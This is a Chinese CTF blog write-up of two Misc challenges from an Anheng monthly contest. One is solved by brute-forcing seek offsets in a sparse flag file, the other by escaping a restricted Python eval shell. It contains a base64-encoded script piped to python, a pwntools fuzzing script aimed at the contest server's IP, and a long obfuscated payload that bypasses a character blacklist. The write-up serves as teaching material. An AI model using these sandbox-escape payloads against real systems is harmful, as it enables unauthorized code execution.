安恒5月月赛两个有点意思的Misc

web题直到考点就是构造不出payload我太蔡了。。

by：小帽

testyournc

连上nc后直接进了shell，ls -al命令看看，flag文件有丶大，cat不出来；后来ls /看本题用python启动的，而且居然能运行python，那直接🐛了。python -c “a=open(‘flag’);print(a.read())”一把唆了。然后内存超了。。我想到了这个蛇皮操作：

可惜还有时间限制，用不了一会儿就down了。继续瞎翻，看到了bak文件（如下）

#!/usr/bin/python
#coding=utf-8

from random import randint
from uuid import uuid4

flag = [hex(i)[2:-1] for i in uuid4().fields]

f=open('/home/ctf/flag','w')
f.write('')
f.seek(1024*1024*1024)
f.write('flag{')
offset = 1024
for i in flag:
    f.seek(1024*1024*1024*randint(offset,offset+2048))
    offset += 2048
    f.write(i)
f.write('}')
f.seek(1024*1024*1024*randint(offset,offset+2048))
f.write('good job!')
f.close()

哇 seek是什么操作阿，百度一下。哇 居然可以控制指针诶。randint函数出现的位置也是乘上了10241024\1024，所以他不那么随机，写脚本暴力一下

exp：

echo YT1vcGVuKCdmbGFnJykKYS5zZWVrKDEwMjQqMTAyNCoxMDI0KQpmb3IgaSBpbiByYW5nZSgxMDI0LDEzNDI4KToKICAgIGEuc2VlaygxMDI0KjEwMjQqMTAyNCppKQogICAgaWYgYS5yZWFkKDEpPT1zdHIoY2hyKDB4MDApKToKICAgICAgICBjb250aW51ZQogICAgZWxzZToKICAgICAgICBhLnNlZWsoMTAyNCoxMDI0KjEwMjQqaSkKICAgICAgICBwcmludChpKQogICAgICAgIHByaW50KGEucmVhZCgyMCkpCiAg | base64 -d | python

PY me

打开就在py里，hint()看到一个检测函数，ban了一部分字符，最后判断执行结果是不是指定字符。

hint：

def rceMe(s):
    for i in str(s):   
        if( 1+1==2 ):
            print("check failed. Some of your input in this function are banned!")
            return
    print 'pass check!'

    if False==0:  
        result = eval(s)
        print(result)
        if(resut == "print open('flag.txt','r').read()"):      
            #h#e#r#e#_#i#s#_#y#o#u#r#_#f#l#a#g#
            pass
        else:
            print 'sorry'
    return

在pyshell里也ban了蛮多东西的_*_ import system还有一些危险动作都被ban了。尝试rceMe函数，？？我打个字母q也不行？循环测一遍好了

from pwn import *
import string
context.log_level = 'DEBUG'
c=remote('183.129.189.60',10022)
c.recvuntil('>>> ')
pas=''
err=''
for i in string.printable:
    print(i)
    if i=='"':
        c.sendline("rceMe('"+i+"')")
    else:
        c.sendline('rceMe("'+i+'")')
    a=c.recvn(0x0b)
    print(a)
    if a=='pass check!':
        pas+=i
    else:
        err+=i
    c.recvuntil('>>> ')
print('pass:')
print(pas)
print('error:')
print(err)

这 还怎么搞。。。就省几个符号了。而且还没法像php一样搞两个hex异或阿啥的

这里省略各种瞎测试比如符号_可以返回上一个执行的结果，不过被ban了

事情的转机！！！！！！！！！！！

在我无聊重新fuzz字符时从0x00到0xff，这一试，正好发0x00过去是发了个空(NULL)过去，题目崩了，正好给我看到了返回的报错。emmm有点激动没截图，主要看到了题目名好像叫pyfail啥的。拿这个关键字搜到了重要的参考文档。

原来是y1ng老师高中时期的题改的啊。😭😭😭照着这个文档就可以构造payload了，但是比原题多ban了一个加号，当然原文档也给出了绕过

具体构造看文档好了。好像Y老师用了另一种构造加号的方法，我还没学- -

原构造函数是

def brainfuckize(nb):
    if nb in [-2, -1, 0, 1]:
        return ["~({}<[])", "~([]<[])",
                 "([]<[])",  "({}<[])"][nb+2]

    if nb % 2:
        return "~%s" % brainfuckize(~nb)
    else:
        return "(%s<<({}<[]))" % brainfuckize(nb/2)
'+'.join(["`'%\xcb'`[{}<[]::~(~({}<[])<<({}<[]))] % " + brainfuckize(ord(i)) for i in 'print open('flag.txt','r').read()'])

然后，把所有加号换成逗号，前后加[]，这样 我们构造出了一个列表再用``包裹它，后面接[(({}<[])<<({}<[]))::((({}<[])<<({}<[]))<<({}<[]))]这个字符串（代表了[2::5]）即可。

下面是exp：有需要自己学吧：

from pwn import *
import string
context.log_level = 'DEBUG'
txt="print open('flag.txt','r').read()"
txt='''`[`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % ((((~((~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % (~(~((~((~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % ~(~((~(~(~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % (~(((~(~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % ((~(~(~((~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % (((((({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % ~((((~(~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % ((((~((~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % ~(~(~(~((~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % (~(((~(~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % (((~(~(({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % ~(((~((({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % (~((~((~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % ((~((~(~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % ~(~((((~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % ~(((~((~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % (~(((~(({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % ((~(~(~((~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % (((~(((~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % ((~(~(~((~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % ~(((~((({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % ((~((~(({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % ~(((~((({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % (~(~((~((~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % ~(((~((({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % ~(~((~(~(({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % (~(((~(({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % (~(~((~((~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % ~(~(~(~((~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % ~(~((((~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % ((~(~((~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % (((~(~(({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])),`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % ~(~((~(~(({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))]`[(({}<[])<<({}<[]))::~(~(({}<[])<<({}<[]))<<({}<[]))]'''
c=remote('183.129.189.60',10022)
c.recvuntil('>>> ')
c.sendline('False=True')
c.recvuntil('>>> ')
c.sendline('a=""')
c.recvuntil('>>> ')
pas=''
err=''
for i in range(0,len(txt),80):
    #print(i)
    c.sendline("a+='"+txt[i:i+80]+"'")
    c.recvuntil('>>> ')
#c.sendline('a')
#c.interactive()
c.sendline("rceMe(a)")
#c.sendline('''rceMe('`"%\xcb"`[{}<[]::~(~({}<[])<<({}<[]))] % ~(((((~(({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))')''')
c.interactive()

由于构造时想跑偏了，所以

。。。wtcl😭😭

赏

奥利给

支付宝

微信